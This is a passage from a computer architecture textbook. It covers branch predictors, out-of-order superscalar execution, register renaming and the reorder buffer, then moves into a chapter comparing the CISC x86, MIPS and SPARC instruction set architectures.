schemes attempt to minimize the interreferences between conflicting branches that
share the same set of counters. For example, the low-significant bits taken from the
program counter can be concatenated with the BHR as index to the shared counters.
Other approach suggests performing a bitwise xor between the BHR and n bits taken
1 Microarchitecture 33
from the PC. Both schemes reduce the likelihood for collisions by using some bits
from the PC to map with the same history to different counters.
Global two-level branch predictor replaces the local BHR fields with one global
history register (GHR) (Mittal 2019; McFarling 1993). An n-bit GHR represents
the history of the n recently executed branches in the program. In the baseline
scheme of the two-level global BTB, presented by Fig. 36, the n-bit GHR is used
as index to a set of 2n saturated counters which determine the prediction per
every different combination of global history. One of the potential problems with
the global predictor is the case of uncorrelated branches which exhibit different
behavior for the same history. This may prevent the two-bit counters to correctly
predict the branch outcome. One of the solutions to this problem, termed g-share
(Skadron et al. 1998), suggests performing a bitwise xor on the GHR with bit from
the PC. This may help to spread different branch instructions with the same history
to different saturated counters.
Various processors, such as Alpha 21264 (1999), employ hybrid predictors
(also termed tournament predictor) which combine both local and global two-
level BTBs. A general structure of a hybrid predictor is illustrated by Fig. 37. The
hybrid predictor is governed by a chooser mechanism. The chooser learns per every
prediction which BTB is the preferred for the prediction. For example, in the Alpha
21264, the chooser is implemented as an array of two-bit elements indexed by the
GHR. Every two-bit entry represents a different predictor local or global. A value
of 1 indicate that in the last prediction, the corresponding predictor was correct;
otherwise, the predictor was wrong. The chooser in this case uses the local predictor
only if in the last prediction which corresponds to the GHR value, the local was
correct and the global was wrong. In all other cases, the global predictor is preferred.
There may be different implementations for the chooser. For example, the chooser
34 F. Gabbay
array can be indexed by the PC instead of the GHR; in addition, the chooser array
may also implement various FSMs to learn the preferred predictor per every branch.
In deep processor pipeline design, updating the BTB can be become a highly
complicated process due to the long latency between the fetch stage, where the
BTB lookup is performed, and the branch resolution stage where the BTB update
occurs. As a result, new branch instructions may enter the processor pipeline while
the prior branches are not resolved. If the history and the counters are not updated till
the branch is resolved, the new branches may see outdated history and counter state
resulting in high mis-prediction rate. Therefore, the BTB is speculatively updated
with the prediction; however, in case of mis-prediction it is needed to roll back to
1 Microarchitecture 35
the BTB state prior to the speculative updates. A special hardware mechanism is
needed in the BTB both for maintaining the speculative updates and for recovering
the BTB state in case of mis-prediction. Additional advanced branch prediction
mechanisms can be found in modern processors, such as the return stack buffer
(RSB) (Skadron et al. 1998) which is used to predict the target address of a return
from subroutine, the loop predictor which is used for the branch loop prediction,
and the iBTB (Simcha Gochman et al. 2003) used for indirect branch prediction.
Structural Hazards
Structural pipeline hazards occur due to either lack of hardware resources or in
the case of a collision on resources needed by multiple pipeline stages. There can
be several scenarios of structural conflicts. For example, if assume a unified cache
memory for both instruction and data, then both fetch stage and memory stage may
access the cache at the same clock cycle. If the cache has a single access port, then
this is a structural hazard that can be resolved either by using an arbiter for the cache
access or by duplicating the cache port to solve the collision. Another solution which
was adopted by the processor was a split instruction and data caches, also known
as the Harvard architecture. An additional example of structural hazard happens if
it is decided to retime the write-back to the register file and perform writes of non-
load instructions at the memory stage instead of the WB stage. Loads write-back
are kept to occur at the WB stage. The structural hazard in this example happens
when an ALU instruction at the memory stage attempts writing to the register file
while simultaneously a load instruction tries to write at the WB stage. Since the
register file has only one write port, this structural hazard will have to be resolved
by duplicating the write port of the register file or by adding an arbiter to arbitrate
between writes from these two stages.
Multiple-Issue Processor
So far, the discussion was focused on a single pipeline processor where instructions
were executed in order. Various techniques have been presented to improve pipeline
utilization and overcome pipeline data hazards and control dependencies. What
is the next evolution step for processors? Can performance be further improved?
Recall that the execution time, provided by Equation 3, is a multiplication of the
instruction count (IC), the average clocks per instruction (CPI), and the clock cycle
time (T=1/f):
addition, there is also a practical limit to the granularity of breaking the processor
data-path and control unit into many pipeline stages. This will not only complicate
the pipeline control unit, increase the number of sampling stages, and challenge
the complexity of the forwarding network but is also limited by physical design
consideration.
Another option to improve execution time is to reduce the IC. This approach,
which was adopted by the CISC (Complex Instruction Set Computer) processors,
suggests using complex instructions which can process multiple complex opera-
tions. This approach may eventually increase the clock cycle time and increase the
CPI due to the complexity of the new instructions and the required logical circuits.
Decreasing the (CPI) or increasing the (IPC (instructions per clock cycle)) is also
a valid approach to improve processor performance. In fact, all previous techniques
presented in the previous section help to decrease processor CPI and improve
pipeline utilization by minimizing pipeline stall cycles. CPI does not only depend on
the processor microarchitecture but also on the program being run. For example, a
program with high number of data dependencies may have low pipeline utilization
and higher CPI relative to program with low data dependency rate. Can the CPI
be further improved? Can one achieve CPI< 1 (or IPC>1)? In order to do so, the
processor will need to handle multiple instructions being processed in parallel by
multiple pipelines – such a type of processors is termed multiple-issue processors.
A (superscalar) processor, illustrated by Fig. 38, is a typical multiple-issue
processor which employs multiple pipelines running in parallel. In this example,
multiple instructions are fetched in parallel, decoded, executed, access the memory
(if needed), and retire – all being processed in parallel manner.
The key for superscalar processor efficiency relies on the amount of parallelism
exhibited by the program being run. The measure for such a parallelism, termed
ILP (instruction-level parallelism), is defined as the average number of instructions
which can be executed in parallel while preserving the program correctness. ILP is
often illustrated using a dataflow graph, where every node represents an instruction
Fig. 38 A superscalar
processor pipeline
1 Microarchitecture 37
pipeline efficiency will be significantly improved and would be limited by the ILP
of the program.
Out-of-order execution is the process of executing instructions based on the
dataflow graph while preserving the program correctness. There are two main
approaches for out-of-order execution: static and dynamic. Static out-of-order
execution relies on the compiler to reorder instruction in accordance with the
dataflow graph. Very long instruction word (VLIW) processors rely on such an
approach as illustrated by Fig. 42.
In VLIW processors, a very long word instruction container is used to encapsu-
late multiple instructions which can be executed in parallel. Since the encapsulation
process is performed by the compiler, it may yield limited performance gain due
to lack of information at compile time related to dynamic events which may cause
pipeline stalls such as cache misses, branch mis-prediction, etc. Another limitation
is that compilers cannot pack control-dependent instructions since the resolution
of the branch is not known at compile time. VLIW processors, though, introduce
several advantages. They simplify their hardware implementation, and as a result
they can run in higher frequency or alternatively save power. For example, in such a
processor, the need of forwarding network can be eliminated.
1 Microarchitecture 39
• Fetch (F) – Multiple consecutive instructions are fetched in parallel. BTB lookup
is performed for control flow speculation.
The fetch, decode, and dispatch stages process instructions in order, the execution
stage executes instructions out-of-order, while the commit stage performs instruc-
tion retirement in an in-order manner. At dispatch stage instruction dependencies
are typically evaluated and in case they are ready to execute, they are sent to the
corresponding execution unit. True-data-dependent instructions cannot be executed
and are pushed into the reservation stations. The reservation stations act as a
buffer for instructions to wait till they become ready to execute. Every entry in the
reservation station is connected to the forwarding network and snoops the results
being forwarded. When all the source operands are ready, the instruction can be fired
for execution. In the general scheme presented by Fig. 43, the reservation stations
(R.S.) are implemented as distributed buffers attached to every execution unit.
Various process implementations may use a unified reservation station which serves
all execution units. At the execution stage, the calculated results are broadcasted to
the forwarding network as soon as the result is ready and as a result may fire pending
instructions for execution in the next clock cycle.
Out-of-order superscalar processors introduce major microarchitectural com-
plexity and design challenges. The duplicated pipelines, complex pipeline control
unit, and the dense forwarding network significantly complicate the processor
design, verification, and physical design implementation process. In addition, they
introduce additional types of pipeline data hazards known as write-after-write
(WAW) hazards and write-after-read (WAR) hazards. WAW and WAR hazards,
illustrated by Fig. 44, may lead to incorrect program execution. WAW hazard,
also termed false dependency, occurs when two instructions that have the same
destination register are reordered by the out-of-order processor. WAR hazard, also
referred to as anti-dependency, happens when two instructions are reordered by the
processor, and the later instruction in the program order writes to a register that is
used by an earlier instruction. As a result, the earlier instruction may read the wrong
value.
Can these anti-dependencies and false dependencies be solved? For example,
renaming the detitanation registers in the examples above can eliminate these
dependencies as illustrated by Fig. 45 while still preserving the correctness of the
program.
Out-of-order superscalar processor employs register-renaming mechanism to
eliminate both WAR and WAR hazards. The principle of register renaming is
based on decoupling the architectural registers (which are part of the Instruction
Set Architecture) used by the program code from the physical registers which can
host them. As part of the register renaming scheme, the processor maintains a
1 Microarchitecture 41
Fig. 45 Elimination of
WAW and WAR hazards with
renaming
bank of physical registers which can be larger than the number of architectural
registers. In addition, a mapping table, termed register alias table (RAT), is used
to map the architectural register identifiers to the physical register locations. The
register renaming process, performed at the decode stage, involves replacing the
architectural source registers with the physical register based on the mapping
specified by the RAT. In addition, every architectural destination register is mapped
to a new physical register and the RAT is updated. This mechanism assures that the
processor core can eliminate both false and anti-dependencies as long as there are
available physical registers. An example of register renaming process is illustrated
by Fig. 46.
While register renaming can solve false and anti-dependencies, they cannot
eliminate true-data dependencies (RAW hazards). True-data dependencies reflect
the serial parts of the program code, and therefore the dataflow graph is considered
as the upper bound on ILP. Various past studies suggested predicting the values
being calculated by instructions and speculatively forwarding them to true-data-
dependent instructions (Lipasti and Shen 1996; Gabbay and Mendelson 1997,
1998). This technique, known as value prediction, attempts to collapse true-data
dependencies and exceed the dataflow limitations on ILP. If the prediction is found
to be correct, instruction execution will continue with no disruption. In case of value
mis-prediction, all the dependency chain which was fed by the incorrect prediction
will be flashed out of the pipeline and re-executed using the correct value. Various
value predictors were introduced such as the last-value predictor (Lipasti and Shen
42 F. Gabbay
1996) and the stride value predictor (Gabbay and Mendelson 1998) and several
others (Wang and Franklin 1999). Last-value predictor predicts the outcome value of
an instruction based on the recently computed value by the instruction. Stride value
predictor generalizes the last-value predictors and attempts to predict the destination
value based on the last seen value plus a stride which is learned by the predictor. The
stride is calculated as the difference between the two recently seen values.
Control dependencies also introduce major performance challenges to super-
scalar out-of-order processors. Since the efficiency of such processors highly
depends on their ability to have the needed supply chain of instructions for parallel
execution, the demand for high-bandwidth undisrupted instructions flow is crucial.
Branch prediction, in this case, plays a key role not only in reducing the branch
penalty but also in helping the processor to fetch instruction across the branch
boundaries (using the BTB prediction) and potentially increasing the effective
supply chain of candidate instructions for parallel execution. Moreover, the need
for highly accurate branch predictor is an essential requirement for such processor.
Let’s consider a processor with a depth of 100 instructions (instruction window),
and let’s assume that 20% of instructions in the program are branches. Assume that
the branch predictor accuracy is 95%. On average there will be 0.20 × 100 = 20
branch instructions in pipeline. The likelihood that all instructions were predicted
correctly is 0.9520 which is approximately 36%. A 1% accuracy improvement in
the BTB from 95% to 96% will increase the probability from 36% to 44%. This
demonstrates the importance of branch prediction accuracy to provide undisrupted
fuel of instructions to the out-of-order superscalar processor.
The Reorder Buffer (RoB) is the mechanism that concludes the out-of-order
superscalar processor overview. The RoB, which is usually implemented as a cyclic
buffer, maintains a record per every instruction being processed. The RoB records
are ordered in accordance with the original order of instructions within the program.
The RoB is the key mechanism which is responsible for instructions to retire and
commit their architectural changes (writes to memory or register file) in order.
The commit rule used by the RoB is that an instruction can commit only if it
1 Microarchitecture 43
completed execution and all prior instructions completed successfully. The in-order
commit process performed by the RoB is essential to assure the correct order
of interrupts (precise interrupts) and to allow speculatively executed instructions
(due to branch prediction or value prediction) to wait in the RoB until they can
be committed. The RoB also facilitates the flash process in case of branch mis-
prediction since instructions are ordered in the RoB in accordance with program
order. This simplifies the detection of the location of flushed instructions since
the RoB maintains the needed details on the processing stage of every pending
instruction. Last, the RoB guarantees that all architectural state changes will be
reflected to the external world as if the program was executed sequentially.
Conclusions
In particular, when advanced process nodes are reaching the atomic scale and
processor die size continuously grow, the introduction of new 2.5D and 3D integra-
tion technologies can offer significant opportunities for further scaling and system
integration. Advanced technologies, such as Chip-on-Wafer-on-Silicon (CoWoS),
offer advanced multi-die integration with high-bandwidth memory (HBM) on a
silicon interposer. Today, 3D integration technologies are already employed by
different applications such as routers, FPGAs, and GPUs; however, they have not
significantly emerged into traditional general-purpose microprocessor designs. Will
microprocessors be able to leverage such technologies and offer ultra large-scale
integration of 1000s of cores and peripherals? Such a path may offer tremendous
opportunities for performance scale, memory bandwidth enhancements; however, it
binds the system to a predefined architectural topology which cannot be controlled
by users.
Another force which is changing the paradigm of traditional computer systems is
the ongoing shift from control flow-based computing to dataflow-based computing.
This important trend, driven today by various applications such as machine learning,
high-performance computing, and cryptography, emphasizes microprocessor built-
in conflicts. While microprocessors need to provide pretty decent performance for
a broad range of applications with diverse requirements, they lack the ability to
outperform in specific domains which have different processing requirements. This
gap has boosted accelerator development which are tailored for specific applications
such as GPUs, TPUs, FPGAs, and ASIC devices. So far, microprocessors have
not been able to offer a competitive performance with respect to accelerators.
SoCs have integrated various co-processor engines which can be programmed by
the CPU to execute specific workloads. Such a solution may introduce a limited
performance improvement, in particular when a massive scale of processing is
involved. It will be highly interesting to see how microprocessors and accelerators
will emerge in the next decades. Will they continue to coexist or will there be
a fusion between the two domains? Emerging technologies such as embedded
FPGAs offer various opportunities for microprocessors to integrate programmable
logic into the processor silicon die. When such technologies become more mature
and introduce higher scale and performance, they may offer CPUs a competitive
enhancement in the era of accelerated computing.
Finally, powerful emerging memory technologies also introduce a major impact
on future microprocessor roadmap. Stack of high-bandwidth memories (HBMs)
offers low latency and high-bandwidth integration with processors. Additional
approaches such as near- or in-memory computing introduce major memory band-
width and computational advantages; however, such technologies need to become
mature enough before they can be physically integrated into commercial processors.
Memristor technologies have also made a major progress in the past decades
offering high-density, low power, and resiliency for memory and storage devices.
Memristors have not mature yet for commercial product deployment; however, they
may significantly change microprocessors’ future memory systems.
In summary, future microprocessors incorporate major exciting opportunities
that combine emerging technologies which will no doubt change the traditional
1 Microarchitecture 45
paradigm of computing. These changes are driven not only by new technologies
but also by the incredible number of new applications of computer systems which
affect every field in the day-to-day life.
References
Alpha 21264 Microprocessor Data Sheet (1999) Revision 1.0, Feb 1999. Compaq Computer
Corporation
Gabbay F, Mendelson A (1997) Speculative execution based on value prediction. Technical report,
Technion
Gabbay F, Mendelson A (1998) Using value prediction to increase the power of speculative
execution hardware. ACM Trans Comput Syst 16(3):234–270
Hennessy JL, Patterson DA (2011) Computer architecture. A quantitative approach, 5th edn.
Morgan Kaufmann Publishers Inc., San Francisco
Kane G (1988) MIPS RISC architecture. Prentice Hall, Inc.
Lee JKF, Smith AJ (1984) Branch prediction strategies and branch target buffer design. IEEE
Comput Mag 17(1):6–22
Lipasti MH, Shen JP (1996) Exceeding the dataflow limit via value prediction. In: Proceeding of
the 29th annual ACM/IEEE international symposium on microarchitecture, pp 226–237
McFarling S (1993) Combining branch predictors. Digital Western Research Laboratory, Technical
Report
Mittal S (2019) A survey of techniques for dynamic branch prediction. Concurr Comput Pract Exp
31(1) p. e4666
Patterson D, Watterman A (2017) The RISC-V reader: an open architecture atlas. ISBN-13: 978-
0999249116. Strawberry Canyon Publishers
Simcha Gochman RR et al (2003) The Intel Pentium M Processor: microarchitecture and
performance. Intel Technol J
Skadron K, Ahuja PS, Martonosi M, Clark DW (1998) Improving prediction for procedure
returns with return-address-stack repair mechanisms. In: Proceedings. 31st annual ACM/IEEE
international symposium on microarchitecture, Dallas, pp 259–271. https://doi.org/10.1109/
MICRO.1998.742787
Sloss AN, Symes D, Wright C (2004) Chapter 2 – Arm processor fundamentals. In: The Morgan
Kaufmann series in computer architecture and design, ARM system developer’s guide. Morgan
Kaufmann, pp 18–44. ISSN 15459888, ISBN 9781558608740. https://doi.org/10.1016/B978-
155860874-0/50003-4
von Neumann J (1945) First Draft of a Report on the EDVAC, archived from the original (PDF) on
14 Mar 2013, retrieved 24 Aug 2011
Wang K, Franklin M (1999) Highly accurate data value prediction using hybrid predictors. In:
Proceeding of the 30th annual ACM/IEEE international symposium on microarchitecture,
pp 281–290
Yeh T-Y, Patt Y (1991) Two-level adaptive training branch prediction. In: Proceedings of the 24th
annual international symposium on microarchitecture, pp 51–61
The Architecture
2
Avi Mendelson
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48
Terms and Notations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 50
Laws and Models in Microprocessor/System-on-Chip (SoC) Architectures . . . . . . . . . . . . . . . 50
ISA Selection and Considerations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54
CISC: Complex Instruction Set Computer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54
RISC: Reduced Instruction Set Computer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61
The RISC-V Approach for ISA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 69
Summary of ISA Selection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 73
Vector and SIMD Extensions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 73
Cross-Layers Optimizations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 79
Background . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80
Delayed Branch in MIPS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80
The User-Defined Microcode Programming . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81
VLIW Architectures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81
HW/SW Codesign: The CUDA Approach . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 82
ISA Agnostic Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84
The Use of Intermediate Representations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84
Binary Translation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 85
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 86
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 86
Abstract
A. Mendelson ()
CS Department, Technion, Haifa, Israel
e-mail: [email protected]
on optimizations that break the barriers between the traditional software and
hardware interfaces. Finally, it discusses the main differences between general-
purpose processors and dedicated (domain-specific) architectures.
Keywords
Introduction
MEMORY
Fetch
Decode I/O
Execute
Memory
Write-back
modes of operations. A dedicated bit in the status register indicates the current
execution state, meaning it is used to help distinguishing between these modes.
Thus, the same hardware behaves differently when the system is in execution mode
and when the system is in I/O mode (supervision mode).
The Von Neumann model does not consider the cache hierarchies since it is
transparent to the software model and mainly aims to improve the processor’s
performance. Thus, it is usually considered as part of the microarchitecture (and will
be discussed in the next chapter). Registers, on the other hand, although considered
to be part of the memory hierarchy, do have a significant impact on software, and
so, they are considered to be part of the interface between the software and the
hardware, and so assumed to be part of the ISA.
Figure 2 also depicts the different execution stages of the Von Neumann. It shows
a simple in-order five-stage pipeline architecture where (1) instructions are fetched
from memory with respect to a special register called program counter (some
architectures call it instruction counter), (2) the interpretation of the instruction,
that is, what the system needs to perform, is determined at the decode stage, (3) the
execution stage is dedicated to performing the calculation and to perform address
calculations, (4) during the memory stage, the system uses the address that was
calculated in the third stage to read data or to write data to memory, and (5) finally at
the write back (commit) stage data gets exposed to the external world; for example,
written back to registers.
There are many different types of ISAs, such as CISC (complex instruction
set), RISC (reduced instruction set), vector operations, and mix/hybrid modes. This
chapter attempts to explain why multiple ISAs were created, and what is the cost
of using a “wrong” ISA. We will start this chapter with a discussion on some
of the “traditional” classes of ISA and extend the discussion to methods, such as
50 A. Mendelson
• ISA – Instruction Set Architecture – represents the compiler and other software
packages view of the hardware.
• ILP – instruction level parallelism; how many instructions the system can execute
every cycle.
• CPI – Cycles Per Instructure = 1/IPC = Total number of cycles required to execute the program
Total number of instructions executed in the program
• Performance: It is usually measured as the time it takes to compute a specific
task. One can estimate performance as Performance = IC × CPI × Clock cycle
• Amdahl law (Amdahl 1967, 2013; Gustafson, Reevaluating Amdahl’s law, 1988)
t = t ∗ (1 − F ) + F
S
(1)
The new execution time = the fraction that was not affected + the optimized portion.
This law is used in computer architecture to indicate that it is recommended to
optimize code sections that are often be used.
• Memory footprint: The code and data size needed to keep a program’s complete
instructions and data.
• Power: The amount of electricity a device is consuming at any point in time.
• Energy: The amount of electricity a device consumes during a period of time or
when executing a task.
• Hardware complexity: In this chapter, we assume that hardware complexity is
proportional to the size of the silicon that it takes to implement it.
• Backward compatibility: SW that was compiled to run on an older version of the
hardware will also run on a new generation of hardware. Please note that some
systems require that the new generation of hardware will run the old code, at least
with the same performance (or better performance) as it was used to be executed
using the previous generation of that hardware.
• Load/Store architecture: Architecture that all mathematical operations are done
between registers, and data is always being fetched to a register via Load
instruction and written back to memory using Store instructions (Fig. 3).
• Moore’s Law, coined by Gordon Moore, gave the prediction that the number
of transistors in an integrated circuit doubles every 2 years. This became a
guiding principle for generations of semiconductor technology and resulted
in boosting the performance of computer architecture. However, there is a
noticeable slowdown in the progress in leveraging Moore’s law since 2010s,
due to numerous effects across the complete architecture design stack (e.g.,
leakage power, reliability, manufacturing defects, memory wall, limits of par-
allelism). As a result, architecture designers are moving to alternative avenues
to boost efficiency, such as coarse/fine-grained parallelism (multicore platforms,
reconfigurable architectures), in-memory computing, photonic computing, and
superconducting technologies.
• Dennard’s Power Scaling (Dennard et al. 1974) stated that with increasing
transistor density in an integrated circuit, there is a proportional decrease in
capacitance and voltage – resulting in the same power consumption. This
indicated that the performance per watt increases (doubling every 2 years) since,
with more transistors, higher performance can be extracted at architecture level.
This scaling phenomenon coexisted together with Moore’s Law from the mid-
1970s until it was shown to be broken due to the effects of leakage current and
resulting thermal runaway.
Application-Specific Focus
• Makimoto’s wave (Engineering, Makimoto’s Wave, 1991) showed that the
design community periodically swings between customization and standard-
ization of the system component. With the advent of each new architectural
innovation, there is a significant push towards customization (in turn, increasing
the application performance), which after a while reduces to standardized, and
less flexible, designs catering to a wider segment of applications. The move from
customization to standardization is also correlated with the growth of trained
engineering manpower and robust, sophisticated design automation flows.
General
Purpose Digital
Processors Signal
Log POWER DISSIPATION
Application
Processors Specific Instruction
Set Processors
Log FLEXIBILITY
Field
Programmable
Devices
Application
Specific
ICs
Physically
Optimized
ICs
Log PERFORMANCE
54 A. Mendelson
Different processors aim at various markets; some target multiple markets, termed
“general purpose”; others target specific markets such as IoT devices or sensors. The
market dictates the optimization points and the design philosophy of each processor.
Here are a few examples:
This chapter examines three types of ISA: CISC, traditional RISC, and modern
RISC; for example, RISC-V. For each type, we describe its optimization points,
provide a few examples of processors using it, and discuss the pros and cons of the
approach.
The Baseline: Looking at the ISA of the 8088 and the 8086 Processors
The 8088 processor was one of the first processors Intel launched in 1979 (Singh
1988). It used an 8 bits data path and 20 bits address width. The architecture was
based on16 bits registers (see Fig. 4), adopted the Von Neumann principles of
operation, and implemented a simple in-order architecture. The system uses physical
2 The Architecture 55
memory only and divides it into four segments. Thus, four segment registers were
used to point to the correct memory region. The Code, Data, and Stack segment
registers were automatically selected with respect to the type of operation the system
performed. At the same time, the ES segment register requires an explicit notation
since it was used for sharing data among different tasks.
Since registers were 8 or 16 bits long, a Load or Store instruction could access
only a window of 216 = 64 Kbytes, but the maximum allowed physical memory
size was limited to a megabyte (20 bits). A task running on that processor could
access up to four segments, 64 KB each, and the rest of the memory could be used
via (1) the use of multitask software or (2) manipulation of the segment registers.
The complex instruction set of the X86 architecture allows each instruction to be
quite expressive; Table 2 lists some of the mathematical operations it support (please
note that 8088 and 8086 did not have direct support for floating-point operations).
Table 3 shows all the different addressing modes of an ADD instruction, followed
by the impact of the addressing modes on the execution time of the operation.
So far, we have focused on a subset of a few basic instructions of the X86
architecture, but the “basic” X86 ISA contains more than 100 instructions; each
can be 1–6 bytes long, and the execution time could vary from a single cycle to
hundreds of clock cycles each.
As a result, the code generated by the compiler consumed a relatively small area
(address space) since each instruction was quite expressive. It helped to reduce
the communication needs between the memory and the execution units, but the
overall implementation of the system (hardware) was quite complex. As a result,
the operation clock was relatively slow, and many bugs were discovered during the
product’s lifetime.
IA32 Architectures
When Intel expanded its architecture to 32 bits, it also added quite a few technolo-
gies, such as
Figure 5 depicts the internal state of the IA32 core. CISC architecture allows the
companies (e.g., Intel and AMD) to extend and adjust to new ISA in a relatively
straightforward manner since existing code could continue running using the new
generation of the core, with a performance that was, in most cases, at least the
same as before. But using the same decoding scheme to preserve compatibility
caused some performance penalties since the efficient and short decode schemes
were already being used by instructions that were less frequently used by the
new applications. On the other hand, the development time of a new generation
of processors was significantly reduced since the designers could reuse significant
subsystems of the old generation as part of the new design which shortened the
overall development time.
IA-64 Registers
In order to support compatibility, the IA-64 supports all different lengths of registers
(Fig. 6):
• 64-bit general-purpose registers (RAX, RBX, RCX, RDX, RSI, RDI, RSP, RBP,
or R8-R15)
2 The Architecture 59
• 32-bit general-purpose registers (EAX, EBX, ECX, EDX, ESI, EDI, ESP, EBP,
or R8D-R15D)
• 16-bit general-purpose registers (AX, BX, CX, DX, SI, DI, SP, BP, or R8W-
R15W)
• 8-bit general-purpose registers: AL, BL, CL, DL, SIL, DIL, SPL, BPL, and R8B-
R15B are available using REX
• MMX registers (MM0 through MM7)
• XMM registers (XMM0 through XMM15) and the MXCSR register
• Control registers (CR0, CR2, CR3, CR4, and CR8) and system table pointer
registers (GDTR, LDTR, IDTR, and task register)
• Debug registers (DR0, DR1, DR2, DR3, DR6, and DR7)
• MSR registers
• RDX:RAX register pair representing a 128-bit operand
Please note that some of the registers are mapped onto the same area (see Fig. 6)
to save power, area, and time when the system needs to store or restore the content
of a process.
The above list is only partial, and many more are proposed, such as SGX –
Security Guarded Extension was proposed as an extension to allow the creation and
protection of enclaves; secure memory regions, ISA support for machine learning
algorithms, and more
Some of these technologies require the introduction of new data types
BP16 7 bits
S 8 bits exp
mantissa
Recent X86–64 architectures add support for new short floating-point formats to
provide efficient support for machine learning algorithms, Table 4. We may assume
that the next generation of Intel processors will extend the notion of vectors to the
new notion of multidimensional matrix operations.
Summary
CISC architectures, in general, and Intel architectures in particular, were developed
under the assumption that software compatibility is the most crucial feature the
architecture needs to preserve, even at the cost of extra complexity, since it can
significantly help to achieve better performance and to provide significant benefits
to the end user. This approach enables an easy feature migration path and naturally
supports backward compatibility. However, the CISC architecture presents a few
inherent challenges:
• The critical path determines frequency, and accelerating all stages of a complex
system is costly.
• Suboptimal decoding scheme.
• The architecture is error-prone.
• Difficult to decode multiple instructions in parallel.
• Advanced addressing modes, such as supporting arithmetic operations between
memory and registers, make optimizations very difficult.
• Power is a major issue in modern design, and complexity affects power consump-
tion.
Intel solves (or at least eases) many of these issues at the microarchitecture level;
all Intel architectures, starting at P6, use out-of-order execution and micro-operation
as the internal assembly code of the machine.
We will extend the discussion on how microarchitecture helps in the next chapter.
• Amdahl (Amdahl 2013) low calls for accelerating the part we are using the most
(see Eq. (1))
• At runtime, only a handful of instructions are frequently executed (Hennessy and
Patterson 2007; Patterson et al. 1979)
• Simple design allows an increase in frequency
• Load/Store architecture allows
– To increase the number of registers. In return, it will reduce the number
of overall memory operations considered the main bottleneck of computer
systems.
– Using three operands per instruction enables many optimizations that improve
the execution time.
– The large register window enables an efficient exchange of parameters when
calling a procedure and returning to the caller.
62 A. Mendelson
IBM research was the first to experiment with this new approach, with their
experimental processor IBM 801 (Radin 1983). The idea yields a few competing
research projects, for example, the SPARC processor (Garner 1988), the RISC-I
processor, and the MIPS architecture (Kane and Heinrich, MIPS RISC architectures,
1992.). We start this chapter with a discussion on SPARC and MIPS architecture
before describing the ARM family of RISC processors (Furber 2000).
MIPS
The MIPS architecture started as an academic project at Stanford University
(Hennessy et al. 1982), and soon after, a company was established to commercialize
it (Kane and Heinrich, MIPS RISC architectures., 1992). The processor had different
generations, but in this chapter, we mainly focus on the first generation, termed
MIPS-I, since most of the concepts of the entire family already appear there.
MIPS-I processor was a Load/Store architecture that presented a simple archi-
tecture to increase the frequency (concerning CISC at that time) and allowed the
creation of many new compiler optimizations. The MIPS processor has 32 registers,
32 bits each; some have a specific goal; for example, R0 is hardwired to zero,
and register R31 is used as a link register. The machine assumes in-order, Von-
Naumann architecture but allows multiplication and division instructions to be
executed asynchronously as long as dependencies are maintained.
The program counter is 32 bits long, but the lower 2 bits are wired to “0” since all
MIPS-I instructions are 4 bytes long and aligned to word boundaries. Simplicity was
the main target of all RISC architectures, including MIPS, so instructions are always
4 bytes long and have one of the following three internal formats; R (Register), I
(Immediate), and J (Jump), as depicted in Fig. 7, below:
To improve performance, MIPS introduced the notion of a branch delay slot that
provides the compiler the ability to help the microarchitecture. We will extend the
discussion on that in section “RISC: Reduced Instruction Set Computer”.
MIPS-I was the first RISC architecture to allow complex instructions, such
as floating-point operations, to use multiple cycles to complete an operation. To
support FP operations, MIPS added 32 floating-point registers that could also be
used as 16 double-precision FP registers. Adjust registers could also be paired
in order to support double-precision numbers and double-precision arithmetic
operations.
SPARC ISA
SPARC (Garner 1988) is another RISC core originally developed in Berkeley
and supported by Sun. It also had a simple instruction format (although more
complicated than MIPS), as shown in Fig. 8. Although SPARC was affected by
other RISC architectures, it introduced quite a few unique features, such as a new
use of the register window, the support of coprocessor, and more.
Sparc presents a new use of a Register-Windows; a “scratchpad” of fast memory
region (SRAM), being used as a cyclic buffer of registers. In SPARC, the register
window could contain 40–520 registers, organized as eight global registers and
between 2 and 32 overlapping register banks. At any given time, a process can access
the eight global registers and a dedicated 32 registers managed as a sliding window
out of the scratchpad.
To manage the register window, SPARC added a special register, the CWP, that
was also added to the process’s context (meaning it was saved and restored at during
context switch). The CWP points to a continuous area in the scratchpad and is
served as the currently active register region of a process (see Fig. 9). The active
register window was divided into three subregions; eight registers were treated as
“IN” registers, eight registers as “Local” registers, and the last set of eight registers
as “OUT” registers. When a caller calls a procedure (which can be itself in the case
